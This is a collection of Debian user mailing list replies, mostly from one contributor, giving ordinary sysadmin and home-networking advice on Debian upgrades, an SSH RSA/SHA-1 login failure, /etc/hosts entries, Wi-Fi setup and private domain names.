Yeah.. on Linux, it is recommended to keep the RTC clock in UTC.
Unless Windows has contaminated the machine. See
.

Jeff



Re: Upgrading Buster LTS (10) to Bookworm (current stable) concerns

2024-06-17 Thread Jeffrey Walton
On Mon, Jun 17, 2024 at 3:38 AM Nick Sal  wrote:
>
> I plan to upgrade a server running Buster to Bookworm.
> Server is running: {web,mail} servers, mysql and postregre, docker, ssh, 
> ldap, ferm (firewall), and few other non-critical services.
>
> I'd like to appeal to your experience for a couple concerns:
>
> 1) Should I upgrade in two steps from Buster to Bullseye (oldstable), and 
> then to Bookworm? Or should I go directly from Buster to Bookworm in one step?
> The upgrade will be done by changing sources.list

If I recall correctly, simply changing sources.list is not
recommended. That's because there are post-upgrade scripts that should
be run to finalize a configuration on occasion.

You should follow
,

and friends.

> 2) To the best of your knowledge, do docker images break between such 
> upgrades? Unfortunately, I don't have many details on docker because it was 
> set-up by a previous admin.
>
> If any big break/incompatibility comes to mind for the above services, please 
> don't hesitate to share your story :)

Jeff



Re: Bluetooth/SSH issue

2024-06-16 Thread Jeffrey Walton
On Sun, Jun 16, 2024 at 10:33 PM George at Clug  wrote:
>
> Rayan,
>
> On Monday, 17-06-2024 at 09:18 Ryan Nowakowski wrote:
> > On Sun, Jun 16, 2024 at 02:30:32PM -0600, Charles Curley wrote:
> > > On one of my machines, I have some interesting interference. Bluetooth
> > > works just fine, and so does networking. Bluetooth is normally disabled.
> > > However, when I have Bluetooth turned on (and after I turn it off), SSH
> > > is *slow*.
> > > Is there some sort of cross-talk issue?
> >
> > Sometimes Bluetooth and Wi-Fi share the same radio.  Are you running ssh 
> > over Wi-Fi?  Try running ssh over Ethernet while using Bluetooth.  Is ssh 
> > still slow?
>
> What do you mean by "Bluetooth and Wi-Fi share the same radio" ?
>
> In the early days of Windows 8 Tablet and laptop devices, I noticed that the 
> bluetooth mouse would move jerkily while a large download was happening over 
> Wi-Fi. Many people had this issue, and it was so annoying it led me to tell 
> people not to use bluetooth mice.
>
> Your comment might explain why this problem existed, though I am still not 
> sure what "share the same radio" actually means?

Both Wifi and Bluetooth use the globally unlicensed Industrial,
Scientific and Medical (ISM) 2.4 GHz short-range radio frequency band.

You can buy combo chips for the application. See, for example,
Qualcomm's QCA9377,
.

Jeff



Re: Package libllvm12:i386 does not exists on Debian ?

2024-06-16 Thread Jeffrey Walton
On Sun, Jun 16, 2024 at 12:48 PM Mario Marietto  wrote:
>
> Hello to everyone.
>
> I'm trying to compile wine-tkg from this repo :
>
> https://github.com/Frogging-Family/wine-tkg-git
>
> This is what I did, according to the short tutorial:
>
> root@debian-now:/home/marietto/Scaricati/wine-tkg-git/wine-tkg-git# 
> ./non-makepkg-build.sh
>
> => Installing package: libllvm12:i386 | Using apt
> E: Can't find package libllvm12:i386
> ==> WARNING: Failed to install package: libllvm12:i386
> => Installing apt-smart | Using pip
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
>
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> => Installing apt-smart | Using pip| Attempt: 2/3
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
>
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> => Installing apt-smart | Using pip| Attempt: 3/3
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
>
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> ===> ERROR: Failed to update mirror after 3 attempts.
> => Installing package: libllvm12:i386 | Using apt| Attempt: 2/3
> E: Can't find package libllvm12:i386
> ==> WARNING: Failed to install package: libllvm12:i386
> => Installing apt-smart | Using pip
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 

Re: can't connect to server from outside LAN

2024-06-13 Thread Jeffrey Walton
On Wed, Jun 12, 2024 at 10:33 PM Greg Marks  wrote:
>
> I'm running a Debian server from my home with a static IP address,
> with ssh configured to use key-based authentication rather than
> password-based.  As of a couple weeks ago, I have been unable to ssh to
> my server from external locations.  When I ssh from a laptop connected
> to the wireless network on the same router as my home server, I do
> successfully connect to the server.  But when I ssh from an external
> location, I get this error:
>
>[...]
> The problem began a couple weeks ago; previously (and for many years)
> I had been able to ssh to my server without issue.  The first time it
> failed, I was using free wireless at an airport; I was able to ssh to my
> server from the hotel that morning, and maybe, the first time I tried,
> from the airport, but then subsequent ssh attempts from the airport
> failed to connect.  I mention this only because nothing had changed in
> my server's configuration when this problem began.
>
> This is a real problem for me, as a lot of my work involves sending
> files via scp between work and home.  Any suggestions about how to
> troubleshoot and hopefully fix the problem will be greatly appreciated.

In the past, I experienced similar breakages. In my case, my ISP
(Verizon) provided router updates that blew away my router config. So
I lost port forwarding to my internal servers.

I personally don't make port 22 available at the router. Instead, I
use port 1522 (first server), port 1523 (second server), etc. Then
port 1522 is forwarded to the first server on port 22, port 1523 is
forwarded to the second server on port 22, etc.

Jeff



Re: Please help me identify package so I can report an important bug

2024-06-12 Thread Jeffrey Walton
On Wed, Jun 12, 2024 at 10:33 AM Richard  wrote:
>
> Question is, does it make that much sense to report it to Debian directly? 
> Are you encountering this issue on Debian itself or 
> Armbian/Raspbian/whatever? You reported this to the Raspberry Pi GitHub, so 
> I'd expect them to take this up with the upstream devs themselves, so by the 
> time Trixie is being released, it may already be included.
>
> But besides that, what you describe in the first link sounds to me not like a 
> bug, but as a well thought-through decision. Network adapter names like eth0 
> have been dropped with Debian 11 (I think, maybe even 10). So don't get your 
> hopes up too high to ever see this coming back. But also, just searching the 
> web for this topic, you should have come across this answering your 
> questions: https://wiki.debian.org/NetworkInterfaceNames

The random MAC address discussed in the bug report (with mention of
Network Manager) could be
.

Jeff



Re: [SOLVED] Re: Debian bookworm fails to install

2024-06-07 Thread Jeffrey Walton
On Fri, Jun 7, 2024 at 1:48 PM Hans  wrote:
>
> Got it! Found the reason and a fix for it.
>
> Just not easy to find. It is a dependency problem!
>
> What happened?
>
> Well, in ~config/mylist.list.chroot I added the package "bootcd", which should 
> exist in my live-system. During build this made no problems and all 
> dependencies are ok. But - during install it appears, that there is a 
> dependency conflict with the installer as bootcd needs grub-efi-amd64-bin.
>
> However, when bootcd wants to install, this package will be installed, too as 
> it is dependent. So far, so well.
>
> BUT - grub-efi-amd64-bin conflicts with grub-efi-amd64-bin-signed
>
> and forces it to deinstall,
>
> which, you guess it, the debian-installer needs.
>
> And so the grub-installer crashes!
>
> Now the question, who should be asked for help? Maintainers of bootcd? 
> Maintainers of debian-installer? Or Maintainers of packages?
>
> I do not know, and as long as I do not know, I can not file a bugreport as 
> none of them (and this is fully correct and understandable) is responsible 
> from his sight on.
>
> However, the problem can easily be reproduced.

Forgive my ignorance... How does this translate into an intermittent
problem? It seems like you would never encounter it, or always
encounter it. What makes the problem come and go?

Jeff



Re: Debian bookworm fails to install

2024-06-07 Thread Jeffrey Walton
On Fri, Jun 7, 2024 at 3:08 PM Hans  wrote:
>
> Hi folks,
>
> I am running into an issue, I can not explain.
>
> Let me please shortly describe:
>
> For my own purposes I am building a live-debian ISO with installer. As I am
> finetuning some things (not related to the system itself), I am building
> several ISOs a day.
>
> The live-build is set to bookworm (not bullseye, as lb config does).
>
> However, everything is going fine, the live-system is booting well.
>
> But: When I want to install it, the installer always breaks, when it wants to
> install grub. (grub-installer fails).
>
> As I am doing always a fresh install with completely formatting the harddrive,
> it can not be explained, why this happens.
>
> And more strange: When I build one version, it is working well. Changing
> nothing, and building again, suddenly the installer crashes at grub
> installation and then it will never work again.
>
> To declare: I can build several times, and every installation is working well,
> and suddenly without any reason, it breaks. Doing then using one version
> before (the last one, which worked well), it is still working, but the next
> build is crashing.
>
> Ok, I think you understood, what I meant. Well, one reason I could imagine,
> that the debian mirror, I add during installation process is changing. I am
> using "deb.debian.org", but when using another mirror in my near, I am running
> into the same issue.
>
> I also tried to install grub manually in the console during installation
> process, using "grub-installer /target", but this did neither work nor show
> much useful information.
>
> Any idea, why this is happening? I saw similar messages in some forums, but
> they are all related to Debian 10, which is rather old (and I suppose, these
> bugs are fixed).

You might have a look at grub2 bugs in Bookworm, and see if any look
like they apply to you:
.

Jeff



Re: No login with Debian 12 ssh client, ssh-rsa key, Debian 8 sshd

2024-05-31 Thread Jeffrey Walton
On Fri, May 31, 2024 at 7:08 PM Thomas Schmitt  wrote:
>
> i still have network access to a Debian 8 system, to which i logged in
> from Debian 11 via ssh and a ssh-rsa key. After the upgrade to Debian 12
> ssh fails with this public key authentication.
> The probably relevant messages from a run of ssh -vvv are:
>
>   debug1: Offering public key: /home/.../.ssh/id_rsa RSA SHA256:...
>   debug1: send_pubkey_test: no mutual signature algorithm
>
> To my luck, the old sshd already supports ssh-ed25519 and i was able to
> add the content of the Debian 12 id_ed25519.pub to the Debian 8 file
> .ssh/authorized_keys2 . Now ssh to the Debian 8 machine works again.
>
> But i find this error message "no mutual signature algorithm" strange.
> The Debian 12 ssh client is obviously willing to try ssh-rsa.
> The Debian 8 sshd accepted that key from Debian 11. Why not from 12 ?
>
> In
>   https://www.openssh.com/releasenotes.html
> i find for 9.2 or older only a RequiredRSASize directive of which
> man sshd_config says the default is 1024.
> The ssh-rsa key was generated by Debian 10. man ssh-keygen of buster
> says the default of option -b with RSA was 2048.
> (Does anybody know how to analyze a key file in regard to such
> parameters ?)

If I am not mistaken, the problem you are experiencing is due to using
RSA/SHA-1 on the old machine. The RSA modulus is large enough, but the
hash is weak. That change happened at OpenSSH 8.9.

`ssh -vvv` should show the ciphers offered by the server and client.
It should look something like:

debug2: KEX algorithms: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-sha512@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com
debug2: host key algorithms: ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256

Jeff
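As an added example (not code from the thread or from OpenSSH), the script below parses the `debug2: ... algorithms:` lists from `ssh -vvv` output, re-joining lines a mailer wrapped mid-token, negotiates the KEX and host key algorithms the way RFC 4253 does, and models the RSA user-key signature choice that ends in "no mutual signature algorithm" when an old server sends no server-sig-algs extension. The server proposal and the PubkeyAcceptedAlgorithms list are constructed stand-ins, and `rsa_signature_algorithm` is a simplified model of OpenSSH's behaviour, not its code.

```python
from __future__ import annotations

import re

# `ssh -vvv` prints each side's KEXINIT proposal under one of these headers.
SECTION = re.compile(r"^debug2: (local client|peer server) KEXINIT proposal")
# Lists such as "debug2: KEX algorithms: a,b,c" or "debug2: host key algorithms: ...".
ALG_LINE = re.compile(r"^debug2: (?P<name>.+?) algorithms: (?P<algs>\S+)$")
DEBUG_LINE = re.compile(r"^debug\d: ")


def rejoin_wrapped(text: str) -> list[str]:
    """Undo mailer wrapping: a line not starting with 'debugN:' is the tail of
    the previous line, cut mid-token, so it is appended without a separator."""
    lines: list[str] = []
    for raw in text.splitlines():
        if DEBUG_LINE.match(raw) or not lines:
            lines.append(raw.rstrip())
        else:
            lines[-1] += raw.strip()
    return lines


def parse_proposals(text: str) -> dict[str, dict[str, list[str]]]:
    """{'client': {'KEX': [...], 'host key': [...]}, 'server': {...}}."""
    out: dict[str, dict[str, list[str]]] = {"client": {}, "server": {}}
    side = "client"
    for line in rejoin_wrapped(text):
        m = SECTION.match(line)
        if m:
            side = "client" if m.group(1) == "local client" else "server"
            continue
        m = ALG_LINE.match(line)
        if m:
            out[side][m.group("name")] = m.group("algs").split(",")
    return out


def negotiate(client: list[str], server: list[str]) -> str | None:
    """RFC 4253 section 7.1: the first algorithm in the client's list that the
    server also offers; None means the two sides cannot agree."""
    return next((alg for alg in client if alg in server), None)


def rsa_signature_algorithm(server_sig_algs: list[str] | None,
                            pubkey_accepted: list[str]) -> str | None:
    """Simplified model (not OpenSSH's code) of the client's signature algorithm
    choice for an RSA user key.  None is what ssh -vvv reports as
    'send_pubkey_test: no mutual signature algorithm'."""
    if server_sig_algs is None:
        # A server too old to send the server-sig-algs extension (RFC 8308),
        # like Debian 8's sshd, leaves only the key's base type ssh-rsa (RSA
        # with SHA-1), and OpenSSH 8.8+ dropped that from its defaults.
        return "ssh-rsa" if "ssh-rsa" in pubkey_accepted else None
    for alg in ("rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"):
        if alg in server_sig_algs and alg in pubkey_accepted:
            return alg
    return None


def summarize(text: str, pubkey_accepted: list[str]) -> dict[str, str | None]:
    """Negotiated KEX and host key algorithms, plus the RSA user-key outcome
    against a server that sent no server-sig-algs extension."""
    p = parse_proposals(text)
    return {
        "kex": negotiate(p["client"].get("KEX", []), p["server"].get("KEX", [])),
        "hostkey": negotiate(p["client"].get("host key", []),
                             p["server"].get("host key", [])),
        "rsa_userkey": rsa_signature_algorithm(None, pubkey_accepted),
    }


# Constructed sample: the client KEX line is the one quoted in the thread,
# wrapped as the mailer wrapped it; the client host key line is shortened and
# the server proposal is made up to stand in for an old sshd.
SAMPLE = """\
debug2: local client KEXINIT proposal
debug2: KEX algorithms: curve25519-sha256,curve25519-sha256@libssh.org,e
cdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-
sha512@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-g
roup16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha25
6,ext-info-c,kex-strict-c-v00@openssh.com
debug2: host key algorithms: ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2
-nistp256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,rsa-sha2-
512,rsa-sha2-256
debug2: peer server KEXINIT proposal
debug2: KEX algorithms: diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha256
debug2: host key algorithms: ssh-rsa,ssh-ed25519
"""

# Constructed, abbreviated stand-in for a modern client's PubkeyAcceptedAlgorithms.
MODERN_PUBKEY_ACCEPTED = ["ssh-ed25519", "ecdsa-sha2-nistp256",
                          "rsa-sha2-512", "rsa-sha2-256"]

if __name__ == "__main__":
    for what, alg in summarize(SAMPLE, MODERN_PUBKEY_ACCEPTED).items():
        print(f"{what}: {alg or 'no mutual algorithm'}")
```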



Re: What DE to replace GNOME with?

2024-05-31 Thread Jeffrey Walton
On Fri, May 31, 2024 at 10:03 AM DdB  wrote:
>
> while being on old-old-stable still (buster) and preparing for an
> upgrade to bookworm, i noticed, that GNOME once again lost compatibility
> to my preferred extensions, giving me a hard choice to either go on with
> my outdated system as long as possible, or find a replacement and change
> my ways of working.
>
> What i did like with GNOME was the ease of use for a handicapped person
> (like me). But i disliked the overwhelming intrusion into the os, that
> suppresses many choices and freedom.
>
> But as i am still feeling like a noob, i would like to collect some
> suggestions and comments from you guys:
> Eventually there is an alternative to the so called
> "quick-toggler-extension", that i used/exploited to generate a kind of
> personal menu, easily configured in one go with a json config file, an
> alternative on another desktop?
>
> And the other miss is the "Windows-corner-preview-extension", that is no
> longer maintained or functional, that i was using all over the place for
> many different use cases and purposes. That one also suffers from
> changes inside GNOME, that basically kill volunteers work (repeatedly!)
>
> Now is the time to plan ahead for years to come and i don't know, what i
> should do.

It looks like you have at least ten choices of desktop environments:
. I don't know if your
extensions are compatible with any of them.

MATE provides an experience similar to GNOME 2.

Jeff



Re: Anybody Skype users here?

2024-05-30 Thread Jeffrey Walton
On Thu, May 30, 2024 at 10:53 PM George at Clug  wrote:
>
>  [...]
>
> I am guessing you have tried 'Skype for Web' ?  How did you find it? If it 
> does not suit your purposes, I would like to know why, as 'Skype for Web' 
> might be a solution for myself if it works enough.
>
> https://support.microsoft.com/en-us/skype/skype-for-web-preview-your-most-asked-questions-9c4836e4-5cdb-4261-ae46-d919b974af8a
> Skype for Web (Preview) - your most asked questions
>
> I want to try the Skype for Web (Preview) experience. How do I do that?
> Please go to https://preview.web.skype.com and sign into Skype.

Skype for Web looks like it could be a good alternative for OP. It has
been around since 2019. Cf.,
.

Both the Linux app from the *.deb and the browser-based app (and other
package formats, like MSI) likely use the web security model, so you
are f**k'd with either one. There's probably no benefit to using one
over the other. Neither can provide a secure channel, and both will
happily allow interception of your calls.

Skype also points people to their community for questions:
. Maybe someone in the community
can answer the OP's questions, like what it's like to use the snap
version of the app.

Jeff



Re: "Repeaters", etc. - FRITZ!Box 7490

2024-05-29 Thread Jeffrey Walton
On Tue, May 28, 2024 at 10:43 AM Paul M Foster  wrote:
>
> On Tue, May 28, 2024 at 04:43:38AM -0400, Michael Grant wrote:
>[...]
> > To be clear, the wifi is the part that is at your property.  There are
> > some providers termed WISPs (wireless internet service providers) that
> > use wifi (not 4G/5G) to connect you to the internet.  Just being clear
> > here that even if they do this, we're not talking about extending that
> > wifi signal.  That signal (whether it's really wifi or 4G or 5G or
> > even adsl or fibre or cable), it gets terminated at or just before
> > your router in your house.  So I'm not talking about that side of your
> > connection at all.
>
> I've heard of 5G internet providers, but I'd rather avoid them. There's
> only one of those in the area we're moving to.

You also have Starlink if you are too rural to get traditional
broadband service. Starlink sends you the satellite dish and the wifi
router. Also see .

Amazon is getting ready to launch satellites for Project Kuiper, which
will compete with Starlink.

> > So if I understand properly, you have some devices around your home
> > that don't have built-in wifi and you are not going to string ethernet
> > to them.
>
> To the contrary, I *do* plan to string cat 5/6 to those devices, just not
> all the way to the modem/router, which will likely be in the garage.

This is probably a mistake. You want "home runs" back to the router or
modem. Since you only need two wireless base stations, take the time
to pull the drops for ethernet backhauls. Or hire someone to do it.
(Your on-prem cable service is most likely already pulled this way).

If you use wireless backhauls, then that robs you of bandwidth for
device data since it is being used for the backhaul.

And one other comment based on my experience... don't use the service
provider's wifi modem. Disable the wifi in the service provider's modem
or router, and use two base stations that you purchase. The base
stations that you purchase will perform much better, and give you
better coverage on your site.

Jeff



Re: "Repeaters", etc. - FRITZ!Box 7490

2024-05-28 Thread Jeffrey Walton
On Tue, May 28, 2024 at 2:18 AM Paul M Foster  wrote:
>
> On Tue, May 28, 2024 at 12:43:14PM +1000, George at Clug wrote:
> [...]
> > If you had the money, I would get a cable installer to do a proper job of
> > running cables. I used to be an Electrician, hence I am familiar with
> > running wires, so in my own home I ran Ethernet cable where ever needed
> > (and we have a cavity ceiling). I am guessing this option is not possible
> > for your situation.
>
> Coincidentally, I used to be an electrician too, but we almost never ran
> low voltage except for doorbells.
>
> The house in question appears to have a generous attic, but they've blown
> in two feet of insulation I'd rather not disturb. And that much insulation
> makes the headers of walls very hard to find. Also, I'm not in my 20s
> anymore, and crawling around in attics is difficult.
>
> In the house I'm living in now, I did go into the attic years ago with cat
> 5e and wired up the living room.
>
> FWIW, in the house we're buying, I need internet (wired) in the living
> room, bedroom 2 and bedroom 4. Also, it's concrete block construction
> (outer walls).

You can also run cat5 or cat6 (or rg-6) behind baseboards:
.

Jeff



Re: "Repeaters", etc.

2024-05-27 Thread Jeffrey Walton
On Mon, May 27, 2024 at 8:13 PM Paul M Foster  wrote:
>
> At some point this year, I'm moving into a new house, and it is not wired
> for internet (WHY aren't new houses wired with Cat5/6/7?).

Your contract did not specify the house to be wired. You should have
called it out, if you wanted it.

> The local
> internet provider will likely provide a wireless router, as they all do. My
> idea is to put a device which receives wireless signal from the
> router/modem, and has an RJ45 jack in it in each room. So each room would
> have one of these, and the devices in it would be hooked to that device via
> cat 5e. I hope that's clear.
>
> I'd like to shop for such a device, but I don't know what it's called. Can
> anyone provide advice, and possibly preferred brand names? I'd appreciate

If you want to use ethernet, then you want a switch. Each room gets
wired for ethernet, and each room needs an ethernet cable. All cables
are backhauled to the switch, and the switch is plugged into the
telecom modem or router.

If you want to use wifi, then get a couple of 802.11 AC (or above)
routers. 802.11 AC provides "wifi roaming." Backhaul the wifi base
stations using ethernet to the telecom provider's modem. In this case,
you only need two ethernet cables - one for each backhaul.

802.11 AC was the first to provide wifi roaming. 802.11 AC was branded
Wifi 5. You can also use 802.11 AX, which is Wifi 6. Most (all?) of
your devices should support 802.11 AC/Wifi 5. You should check if they
support 802.11 AX, so you can learn if you can provide the 802.11
AX/Wifi 6 network.

Now, to go from the telecom company's modem or router to the telecom
company's network takes an interface device. Nowadays, that is an ONT
or Optical Network Terminal. The telecom gives (sells?) you the ONT,
too.

The ONT is the equivalent to the old twisted pair NID or Network
Interface Device. Everything inside up to the ONT or the NID is CPE or
Customer Premise Equipment. The subscriber is responsible for the CPE.
The ONT and NID outward is the responsibility of the telecom provider.

The ONT is the bridge from the house's network to the telecom's
network. The ONT can often provide both Ethernet and RG-6 cable to the
modem or router.

Jeff



Re: Address 127.0.1.1

2024-05-24 Thread Jeffrey Walton
On Fri, May 24, 2024 at 1:46 PM Greg Wooledge  wrote:
>
> On Fri, May 24, 2024 at 01:40:38PM -0400, Jeffrey Walton wrote:
> > > On Fri, May 24, 2024 at 11:13 AM Paul M Foster  wrote:
> > > 192.168.254.30  yosemite.mars.lan   yosemite
>
> > 127.0.1.1 is traditionally used for the fully qualified domain name
> > (fqdn). So I would expect to see 'yosemite.mars.lan', but not
> > 'yosemite'.
>
> I don't know why you would expect that.  What purpose would that serve?

Sorry I was not clear. I would expect that because 127.0.1.1 is
traditionally used for a fully qualified domain name, not a hostname.

> The goal here is for programs to be able to look up "the IP address"
> that belongs to $HOSTNAME.
>
> If the hostname is "yosemite", then "yosemite" must appear in the
> /etc/hosts file as an alias for whatever made-up FQDN is being used.
>
> This is what Paul has.  What Paul has looks quite reasonable to me.
> If 192.168.254.30 is in fact bound to an ethernet interface by a
> static configuration (e.g. /etc/network/interfaces) then I would also
> say it looks correct.
>
> > Also, fqdn's end in dot '.' to denote the top of the dns tree.
>
> Not in the /etc/hosts file, they don't.  You may be thinking of BIND
> configuration files.
>
> I've never IN MY LIFE seen trailing dots on hostnames in /etc/hosts.

Jeff



Re: Address 127.0.1.1

2024-05-24 Thread Jeffrey Walton
On Fri, May 24, 2024 at 11:13 AM Paul M Foster  wrote:
>
> Folks:
>
> In my /etc/hosts file, there's a line:
>
> 127.0.1.1 yosemite.mars.lan yosemite
>
> I think Debian put it there.
>
> Later in the file, I've got:
>
> 192.168.254.30  yosemite.mars.lan   yosemite
>
> So there are two entries for the same (my) machine. Is this a problem?
> Specifically, could it cause problems with email (Exim4 or OpenSMTPD)?

127.0.1.1 is traditionally used for the fully qualified domain name
(fqdn). So I would expect to see 'yosemite.mars.lan', but not
'yosemite'.

Also, fqdn's end in dot '.' to denote the top of the dns tree. So I
would expect to see 'yosemite.mars.lan.' (note the trailing dot), and
not 'yosemite.mars.lan' (note the lack of the trailing dot). What can
happen with 'yosemite.mars.lan' is, search domains can be added to it.
So if dhcp says 'isp.com' is a search domain, then your network stack
might make requests for 'yosemite.mars.lan.isp.com'.

Jeff
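An added example (not from the thread) that parses an /etc/hosts file built from the two lines quoted above and reports names mapped to both a loopback and a routable address, which is the situation asked about; the sample file content is constructed.

```python
from __future__ import annotations

import ipaddress


def parse_hosts(text: str) -> list[tuple[str, list[str]]]:
    """Parse /etc/hosts content into (address, [names...]) in file order,
    dropping comments and blank lines."""
    entries: list[tuple[str, list[str]]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if names:
            entries.append((addr, names))
    return entries


def forward_map(entries: list[tuple[str, list[str]]]) -> dict[str, list[str]]:
    """name -> addresses in file order.  The first one is what the classic
    gethostbyname() gets from the files backend; whether later lines are also
    returned depends on resolver settings (the `multi` option in
    /etc/host.conf), so every address is kept here."""
    fwd: dict[str, list[str]] = {}
    for addr, names in entries:
        for name in names:
            lst = fwd.setdefault(name.lower(), [])
            if addr not in lst:
                lst.append(addr)
    return fwd


def first_match(fwd: dict[str, list[str]], name: str) -> str | None:
    """Address a first-match lookup of `name` returns (hosts names are
    case-insensitive)."""
    return (fwd.get(name.lower()) or [None])[0]


def loopback_and_routable(fwd: dict[str, list[str]]) -> dict[str, list[str]]:
    """Names carrying both a loopback and a non-loopback address, the case the
    thread asks about: a program that looks up $HOSTNAME to find 'its' address
    gets whichever line comes first (127.0.1.1 in the sample), not the LAN one."""
    return {name: addrs for name, addrs in fwd.items()
            if {ipaddress.ip_address(a).is_loopback for a in addrs} == {True, False}}


# Constructed sample reproducing the two lines quoted in the thread plus the
# usual localhost line.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
127.0.1.1       yosemite.mars.lan   yosemite
# other entries ...
192.168.254.30  yosemite.mars.lan   yosemite
"""

if __name__ == "__main__":
    fwd = forward_map(parse_hosts(SAMPLE_HOSTS))
    for name, addrs in loopback_and_routable(fwd).items():
        print(f"{name}: first match {first_match(fwd, name)}, all {addrs}")
```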



Re: OpenSMTPD can't parse smarthost

2024-05-23 Thread Jeffrey Walton
On Thu, May 23, 2024 at 2:54 PM  wrote:
>
> On Thu, May 23, 2024 at 01:50:21PM -0400, Jeffrey Walton wrote:
> > > On Thu, May 23, 2024 at 12:08 PM Paul M Foster  wrote:
> > >
> > > On Thu, May 23, 2024 at 12:54:31AM -0400, Jeffrey Walton wrote:
> > >[...]
> > > > Also, I think you should be using *.home.arpa, and not *.lan.
> > > > home.arpa is reserved for private use by ICANN and the IETF. I suspect
> > > > *.lan is not reserved for private use.
> > >
> > > On a LAN, you can use anything you like. I've used .mars.lan for decades
> > > with no difficulty.
> >
> > Citation, please.
>
> No need. It just works. Of course, if you have domain names
> in your LAN which also is "out there", you won't "see" both.

Perhaps that's why you _can't_ use anything you like; and that's why
you should use domains reserved for private use.

Related reading is Brand TLDs (a/k/a Vanity Domains) at
<https://icannwiki.org/Brand_TLD>.

> If your LAN is isolated, you can basically do whatever you
> want.

And then act surprised when networking breaks :)

> And then there are "special" TLDs (.local, I'm looking at
> you) where you'll get lots of fun effects should you decide
> to use them (zeroconf, I'm looking at you :-)

I _think_ .local is reserved for mDNS. See
<https://www.iana.org/assignments/special-use-domain-names/special-use-domain-names.xhtml>.

It looks like .internal and possibly .private are coming soon. See
<https://www.icann.org/en/public-comment/proceeding/proposed-top-level-domain-string-for-private-use-24-01-2024>
and <https://www.theregister.com/2024/01/29/icann_internal_tld/>.

Jeff



Re: OpenSMTPD can't parse smarthost

2024-05-23 Thread Jeffrey Walton
On Thu, May 23, 2024 at 12:08 PM Paul M Foster  wrote:
>
> On Thu, May 23, 2024 at 12:54:31AM -0400, Jeffrey Walton wrote:
>[...]
> > Also, I think you should be using *.home.arpa, and not *.lan.
> > home.arpa is reserved for private use by ICANN and the IETF. I suspect
> > *.lan is not reserved for private use.
>
> On a LAN, you can use anything you like. I've used .mars.lan for decades
> with no difficulty.

Citation, please.

Jeff



Re: OpenSMTPD can't parse smarthost

2024-05-22 Thread Jeffrey Walton
On Thu, May 23, 2024 at 12:43 AM Paul M Foster  wrote:
>
> Folks:
>
> Here's a shot in the dark. I've looked up and down the internet, and can't
> find a solution.
>
